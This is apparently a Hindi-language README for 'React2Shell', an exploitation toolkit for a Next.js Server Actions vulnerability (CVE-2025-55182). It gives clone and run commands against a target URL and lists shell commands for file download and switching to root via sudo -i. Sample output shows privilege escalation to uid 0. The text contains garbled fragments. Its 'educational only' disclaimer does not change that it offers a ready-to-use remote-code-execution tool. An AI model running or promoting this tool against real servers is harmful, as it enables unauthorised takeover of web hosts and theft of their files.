
उन्नत शोषण टूलकिट for Next.js Server Actions (CVE-2025-55182)
Next.js सर्वर एक्शन्स (CVE-2025-55182) के लिए उन्नत शोषण टूलकिट।
React2Shell एक शक्तिशाली, इंटरैक्टिव शेल रैपर है जो React2Shell भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। यह कमांड हिस्ट्री, फ़ाइल ट्रांसफ़र क्षमताएँ और स्वचालित विशेषाधिकार वृद्धि रणनीतियाँ प्रदान करके सामान्य RCE से आगे जाता है।
base64 | sudo -i)।.download <remote> [local]: base64 एन्कोडिंग का उपयोग करके विश्वसनीय बाइनरी-सुरक्षित फ़ाइल डाउनलोड।.save: कमांड आउटपुट को स्थानीय साक्ष्य फ़ाइलों में सहेजें।
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
सत्यापित रूट निरंतरता रणनीति पहचान के साथ चलाएँ:
python3 react2shell.py -u https://target.com/
एक बार शेल के अंदर:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
केवल शैक्षिक उद्देश्यों के लिए। यह उपकरण केवल सुरक्षा अनुसंधान और प्राधिकरण परीक्षण के लिए है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। ऐसे लक्ष्यों को स्कैन या शोषण न करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
नैतिक पैठ परीक्षण और रेड टीमिंग संचालन के लिए विकसित।
| Command | Description |
|---|
.root | रूट मोड टॉगल करें (कमांड को sudo -i में लपेटता है) |
.download <file> | रिमोट सर्वर से एक फ़ाइल डाउनलोड करें |
.save | अंतिम कमांड के आउटपुट को एक फ़ाइल में सहेजें |
.exit | शेल से बाहर निकलें |